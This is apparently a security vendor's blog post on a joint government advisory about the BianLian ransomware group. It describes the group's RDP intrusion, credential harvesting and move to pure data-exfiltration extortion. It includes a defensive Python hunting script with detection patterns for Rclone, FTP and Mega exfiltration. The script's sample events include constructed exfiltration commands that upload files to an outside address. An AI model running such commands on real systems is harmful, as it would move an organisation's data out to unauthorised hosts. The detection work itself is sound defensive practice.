BianLian Ransomware Shifting Focus to Pure Data Extortion

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI) and Australian Cyber Security Centre (ACSC) issued a joint cybersecurity advisory on BianLian ransomware, which has been targeting various critical infrastructure sectors in the United States and Australia since June 2022. Here’s what you need to know.

Who is BianLian Ransomware Group?

The BianLian ransomware group is a ransomware developer, deployer and data extortion cybercriminal group, according to CISA. The group uses remote desktop protocol (RDP) to gain access to its targets’ systems, then employs open source tools for discovery and credential harvesting. Once the group has found the information it’s looking for, it exfiltrates the data via file transfer protocol (FTP), Rclone or Mega. The group then threatens to release the data if a ransom isn’t paid.

BianLian ransomware group has also been known to use a double-extortion model, which encrypts the victims’ systems following exfiltration of the data; however, the group shifted focus in January 2023 to solely exfiltration-based extortion.
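For defenders, here is a hunting sketch for the three exfiltration channels named above (FTP, Rclone, Mega). It is an added example, not code from the CISA advisory or from Nuspire. It assumes process-creation events with `host` and `command_line` fields; the sample events, hostnames and the 203.0.113.10 address are constructed, and matching Rclone by argument shape rather than file name is an assumption of this sketch.

```python
import re

# rclone subcommands that move data off a host
RCLONE_VERBS = {"copy", "copyto", "sync", "move", "moveto"}
# rclone remotes look like "<name>:<path>"; requiring 2+ characters before the
# colon keeps Windows drive paths (C:\...) from matching, (?!//) skips URLs
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:(?!//)")
FTP_URL_RE = re.compile(r"\bftps?://", re.I)
MEGA_RE = re.compile(r"\b(mega\.nz|mega\.co\.nz|mega-put|megacmd)", re.I)

def classify(command_line):
    """Return the exfiltration channels a process command line points to."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]
    if not tokens:
        return []
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    args = tokens[1:]
    hits = []
    # Match on argument shape, not image name, so a renamed rclone still hits
    verb_at = next((i for i, a in enumerate(args) if a.lower() in RCLONE_VERBS), None)
    if verb_at is not None and any(REMOTE_RE.match(a) for a in args[verb_at + 1:]):
        hits.append("rclone")
    # Scripted Windows ftp.exe (-s:<file>) or any ftp:// / ftps:// URL
    scripted_ftp = image in ("ftp", "ftp.exe") and any(a.lower().startswith("-s:") for a in args)
    if scripted_ftp or FTP_URL_RE.search(command_line):
        hits.append("ftp")
    if MEGA_RE.search(command_line):
        hits.append("mega")
    return hits

def hunt(events):
    """Return (host, channels) for every event that needs triage."""
    scored = ((ev["host"], classify(ev["command_line"])) for ev in events)
    return [(host, ch) for host, ch in scored if ch]

# Constructed process-creation events (not real telemetry or IoCs)
SAMPLE_EVENTS = [
    {"host": "FS01", "command_line": r'C:\Users\Public\tool.exe copy "D:\Finance Share" remote1:backup --transfers 16'},
    {"host": "WS12", "command_line": r"ftp.exe -s:C:\Temp\up.txt 203.0.113.10"},
    {"host": "WS09", "command_line": r"curl.exe -T export.zip ftp://203.0.113.10/in/"},
    {"host": "WS03", "command_line": r"mega-put C:\share\export.zip /backup"},
    {"host": "WS07", "command_line": r"cmd.exe /c copy C:\a.txt D:\b.txt"},
]

if __name__ == "__main__":
    for host, channels in hunt(SAMPLE_EVENTS):
        print(f"{host}: {','.join(channels)}")
```

A hit is a lead for triage, not a verdict: backup jobs and administrators use the same tools, so check each match against the hosts and accounts expected to run them.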

Is there a BianLian ransomware decryptor available?

Avast, a digital security and privacy company, released a free decryptor in January 2023 to help victims recover locked files encrypted by BianLian ransomware. It’s important to note that the decryption tool can only address known variants of the BianLian ransomware. That means if threat actors are using a new version of the malware, the decryptor won’t be able to help (at least for now).

It is unclear if the threat group abandoned the double-extortion encryption tactic because of Avast’s decryptor or if they just do not need that part of the attack chain to extort victims into paying ransoms.

What is Nuspire doing?

Nuspire actively threat hunts for indicators of compromise (IoCs) within client environments. In this video, you can learn more about some of the threat hunting methodologies we use and the IoCs we look out for.

What should I do?

Although the BianLian ransomware group has seemingly abandoned data encryption techniques, other groups continue to use this tactic. Given the significant damage data encryption and ransomware can create, it’s important for critical infrastructure organizations and small- and medium-sized businesses to implement robust security measures. These include:

  • Implementing precautionary measures to prevent and detect ransomware, including using anti-ransomware or anti-malware programs.
  • Keeping software up to date, ensuring that vital security patches are installed.
  • Establishing regular backups of your files to a remote server, and implementing organizational firewalls, proxies, web filtering and mail filtering.
